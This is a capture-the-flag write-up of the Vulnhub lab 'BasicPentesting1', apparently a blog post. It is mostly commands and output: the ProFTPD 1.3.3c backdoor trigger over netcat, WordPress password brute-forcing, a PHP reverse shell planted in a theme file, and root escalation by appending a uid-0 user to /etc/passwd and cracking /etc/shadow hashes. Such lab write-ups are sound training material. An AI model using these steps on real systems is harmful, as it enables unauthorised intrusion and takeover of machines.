Vulnhub Writeup : BasicPentesting1

Box Stats :

Box InformationDetails
Box NameBasicPentesing1
SeriesBasic Pentesting
Release Date8 Dec 2017
Author Josiah Pierce
DifficultyEasy
Download LinkLink

Network Scan

The IP of target box is 192.168.1.15, now performing nmap scan on target


$ nmap -sV --top-ports 1000 192.168.1.15 -oN nmap.txt

 Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-28 18:53 UTC
 Nmap scan report for 192.168.1.15
 Host is up (0.0034s latency).
 Not shown: 997 closed ports
 PORT   STATE SERVICE VERSION
 21/tcp open  ftp     ProFTPD 1.3.3c
 22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
 80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
 Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
 
 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 Nmap done: 1 IP address (1 host up) scanned in 7.54 seconds

Nothing unusual, but a quick search for ProFTPD 1.3.3c revealed that it is backdoored version of FTP server. To exploit this backdoor we just need to connect to port 21 with netcat and sends the trigger “HELP ACIDBITCHEZ”.

$ nc 192.168.1.15 21

220 ProFTPD 1.3.3c Server (vtcsec) [192.168.1.15]
HELP ACIDBITCHEZ
uname -a
Linux vtcsec 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

To get a proper interactive shell we can use a python trick python -c 'import pty;pty.spawn("/bin/bash")';

$ nc 192.168.1.15 21

python -c 'import pty;pty.spawn("/bin/bash")';
root@vtcsec:/#

We got the root access to the machine. Now lets find another ways to get root.

Web Application Reconnaissance

From nmap scan we can see that port 80 is open means there is a web server is running

At above list 192.168.1.15 is our VM ip address.

Directory Bruteforce

Bruteforcing using dirb

$ dirb http://192.168.1.15

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Sep 28 19:16:46 2019
URL_BASE: http://192.168.1.15/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.1.15/ ----
+ http://192.168.1.15/index.html (CODE:200|SIZE:177)                                                                                                                           
==> DIRECTORY: http://192.168.1.15/secret/                                                                                                                                     
+ http://192.168.1.15/server-status (CODE:403|SIZE:277)                                                                                                                        

---- Entering directory: http://192.168.1.15/secret/ ----
+ http://192.168.1.15/secret/index.php (CODE:301|SIZE:0)                                                                                                                       
==> DIRECTORY: http://192.168.1.15/secret/wp-admin/                                                                                                                            
==> DIRECTORY: http://192.168.1.15/secret/wp-content/                                                                                                                          
==> DIRECTORY: http://192.168.1.15/secret/wp-includes/                                                                                                                         
+ http://192.168.1.15/secret/xmlrpc.php (CODE:405|SIZE:42)                                                                                                                     

---- Entering directory: http://192.168.1.15/secret/wp-admin/ ----
+ http://192.168.1.15/secret/wp-admin/admin.php (CODE:302|SIZE:0)                                                                                                              
==> DIRECTORY: http://192.168.1.15/secret/wp-admin/css/                                                                                                                        
==> DIRECTORY: http://192.168.1.15/secret/wp-admin/images/                                                                                                                     
==> DIRECTORY: http://192.168.1.15/secret/wp-admin/includes/                                                                                                                   
+ http://192.168.1.15/secret/wp-admin/index.php (CODE:302|SIZE:0)                                                                                                              
==> DIRECTORY: http://192.168.1.15/secret/wp-admin/js/                                                                                                                         
==> DIRECTORY: http://192.168.1.15/secret/wp-admin/maint/                                                                                                                      
==> DIRECTORY: http://192.168.1.15/secret/wp-admin/network/                                                                                                                    
==> DIRECTORY: http://192.168.1.15/secret/wp-admin/user/                                                                                                                       

---- Entering directory: http://192.168.1.15/secret/wp-content/ ----
+ http://192.168.1.15/secret/wp-content/index.php (CODE:200|SIZE:0)                                                                                                            
==> DIRECTORY: http://192.168.1.15/secret/wp-content/plugins/                                                                                                                  
==> DIRECTORY: http://192.168.1.15/secret/wp-content/themes/                                                                                                                   
==> DIRECTORY: http://192.168.1.15/secret/wp-content/upgrade/                                                                                                                  
==> DIRECTORY: http://192.168.1.15/secret/wp-content/uploads/                                                                                                                  

---- Entering directory: http://192.168.1.15/secret/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.15/secret/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.15/secret/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.15/secret/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.15/secret/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.15/secret/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.15/secret/wp-admin/network/ ----
+ http://192.168.1.15/secret/wp-admin/network/admin.php (CODE:302|SIZE:0)                                                                                                      
+ http://192.168.1.15/secret/wp-admin/network/index.php (CODE:302|SIZE:0)                                                                                                      

---- Entering directory: http://192.168.1.15/secret/wp-admin/user/ ----
+ http://192.168.1.15/secret/wp-admin/user/admin.php (CODE:302|SIZE:0)                                                                                                         
+ http://192.168.1.15/secret/wp-admin/user/index.php (CODE:302|SIZE:0)                                                                                                         

---- Entering directory: http://192.168.1.15/secret/wp-content/plugins/ ----
+ http://192.168.1.15/secret/wp-content/plugins/index.php (CODE:200|SIZE:0)                                                                                                    

---- Entering directory: http://192.168.1.15/secret/wp-content/themes/ ----
+ http://192.168.1.15/secret/wp-content/themes/index.php (CODE:200|SIZE:0)                                                                                                     

---- Entering directory: http://192.168.1.15/secret/wp-content/upgrade/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.15/secret/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Sat Sep 28 19:17:13 2019

At above scan we find that there is a hidden wordpress blog at http://192.168.1.15/secret/, lets check it out.

This blog will redirect to http://vtcsec/secret/, so we add vtcsec into our /etc/hosts file.

sudo echo "vtcsec 192.168.1.15" >> /etc/hosts

Now the wordpress blog will properly open.

WPScan on WordPress Blog

$ wpscan --url http://192.168.1.15/secret/ --enumerate u

        __          _______   _____                                                                                                                                                                                
        \ \        / /  __ \ / ____|                                                                                                                                                                               
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ _                                                                                                                                                              
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \                                                                                                                                                               
           \  /\  /  | |     ____) | (__| (_| | | | |                                                                                                                                                              
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|                                                                                                                                                              

        WordPress Security Scanner by the WPScan Team                                                                                                                                                              
                       Version 3.7.1                                                                                                                                                                               
      WPScan.io - Online WordPress Vulnerability Scanner                                                                                                                                                           
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_                                                                                                                                                            
_______________________________________________________________                                                                                                                                                                                                                                                                                        
[+] URL: http://192.168.1.15/secret/                                                                                                                                                                               
[+] Started: Sun Sep 29 05:46:41 2019                                                                                                                                                                                                     
Interesting Finding(s):                                                                                                                                                                                            
[+] http://192.168.1.15/secret/                                                                                                                                                                                    
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)                                                                                                                                                               
 | Found By: Headers (Passive Detection)                                                                                                                                                                           
 | Confidence: 100%                                                                                                                                                                                                
[+] http://192.168.1.15/secret/xmlrpc.php                                                                                                                                                                          
 | Found By: Direct Access (Aggressive Detection)       
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://192.168.1.15/secret/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.1.15/secret/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] http://192.168.1.15/secret/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.9.11 identified (Latest, released on 2019-09-05).
 | Detected By: Emoji Settings (Passive Detection)
 |  - http://192.168.1.15/secret/, Match: '-release.min.js?ver=4.9.11'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.1.15/secret/, Match: 'WordPress 4.9.11'

[i] The main theme could not be detected.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <=========================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/register.

[+] Finished: Sun Sep 29 05:46:42 2019
[+] Requests Done: 21
[+] Cached Requests: 29
[+] Data Sent: 5.049 KB
[+] Data Received: 10.292 KB
[+] Memory used: 90.594 MB
[+] Elapsed time: 00:00:00

As we can see that the userid admin detected by above scan. Now lets bruteforce the wordpress login. We are going to use a simple wordlist file for passwords.

wpscan -U admin -P common.txt --url http://192.168.1.12/secret/

And the output shows the password, which is also admin.

 .....
 [i] Valid Combinations Found:
  | Username: admin, Password: admin
 .....

Now login to wordpress with above credentials.

Getting a shell using WordPress

Link for php reverse shell : Github Link

Change the port number and IP address on script, then put it to the index.php file on wordpress.

Now start netcat listener

$ nc -lvvp 1234

And open the wordpress page.

$ nc -lvvp 1234
Listening on [0.0.0.0] (family 0, port 1234)
Connection from vtcsec 52724 received!
Linux vtcsec 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 04:46:01 up 2 min,  0 users,  load average: 0.58, 0.60, 0.26
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ 

We got the shell but its not the root shell, we need to escalate the privilege to root.

Getting root Privilege

Method 1

By overwriting the /etc/passwd file : As we can see that /etc/passwd is permitted to read-write for all users.

$ ls -al /etc/passwd
-rw-rw-rw- 1 root root 2364 Nov 16  2017 /etc/passwd

So by appending a new user who has root privilege assigned, into the /etc/passwd file with password we are able to get root shell.

Preparing new user to append on file : The root user entry is look like this :

root:x:0:0:root:/root:/bin/bash

where the different columns are as follows :

Username : Encrypted_Password : UserID : GroupID : UserID_Info : Home_Directory

At the place of password there is x which means the password is stored on the /etc/shadow file. Now lets create encrypted password for new user :

$ openssl passwd -1 -salt hack password123

 $1$hack$MLgkAESrYp7kzYz0Ex2fV/

Where :

  • -1 : md5 based password algorithm (other options are -5 for SHA256 and -6 for SHA512 )
  • -salt : salt key, which is “hack”
  • password is password123

Now we have to append below line into /etc/passwd file :

newroot:$1$hack$MLgkAESrYp7kzYz0Ex2fV/:0:0:root:/root:/bin/bash
echo "newroot:\$1\$hack\$MLgkAESrYp7kzYz0Ex2fV/:0:0:root:/root:/bin/bash" >> /etc/passwd

Note : Put \ sign before all the $ sign on the password field, else echo command will try ro interpret it as a variable. Now try to login with our newly created user.

$ su - newroot
 
 su: must be run from a terminal

But it through an error, means we need a tty terminal, which can be obtained by python pty library trick.

python -c 'import pty;pty.spawn("/bin/bash");'
$ python -c 'import pty;pty.spawn("/bin/bash");'
www-data@vtcsec:/$
www-data@vtcsec:/$ su - newroot
su - newroot
Password: password123

root@vtcsec:~# whoami
whoami
root
root@vtcsec:~#

Yep!!!, we got the root shell.!!

Method 2

By cracking password of existing users : This method only works if the /etc/shadow file is world readable, which is not allowed by default. But in this case we can read /etc/shadow file

$ cat /etc/shadow
 
root:!:17484:0:99999:7:::
daemon:*:17379:0:99999:7:::
bin:*:17379:0:99999:7:::
....
....
....
saned:*:17379:0:99999:7:::
usbmux:*:17379:0:99999:7:::
marlinspike:$6$wQb5nV3T$xB2WO/jOkbn4t1RUILrckw69LR/0EMtUbFFCYpM3MUHVmtyYW9.ov/aszTpWhLaC2x6Fvy5tpUUxQbUhCKbl4/:7484:0:99999:7:::
mysql:!:17486:0:99999:7:::
sshd:*:17486:0:99999:7:::

The shadow file stores actual password in encrypted format for user’s account with additional properties related to user password i.e. it stores secure user account information.

As we can see the user marlinspike have encrypted password :

marlinspike:$6$wQb5nV3T$xB2WO/jOkbn4t1RUILrckw69LR/0EMtUbFFCYpM3MUHVmtyYW9.ov/aszTpWhLaC2x6Fvy5tpUUxQbUhCKbl4/:17484:0:99999:7:::

Now save the above line onto the file pass.txt and then we try to crack the hashed password john (jtr).

root@ae3e2e69805d:~/# john pass.txt 

Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
marlinspike      (marlinspike)
1g 0:00:00:00 DONE 1/3 (2019-09-29 09:24) 4.347g/s 34.78p/s 34.78c/s 34.78C/s marlinspike..marlin
Use the "--show" option to display all of the cracked passwords reliably
Session completed

root@ae3e2e69805d:~/# john --show pass.txt 

marlinspike:marlinspike:17484:0:99999:7:::

1 password hash cracked, 0 left

and the password for marlinspike is marlinspike, now lets try to login into marlinspike account.

$ su - marlinspike
su: must be run from a terminal

Means we need tty shell then try to change root.

$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@vtcsec:/$ su - marlinspike    
su - marlinspike
Password: marlinspike
 
marlinspike@vtcsec:~$ whoami
whoami
marlinspike
 
marlinspike@vtcsec:~$ sudo su
sudo su
[sudo] password for marlinspike: marlinspike
 
root@vtcsec:/home/marlinspike# whoami
whoami
root
 
root@vtcsec:/home/marlinspike# 

We got root shell again.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.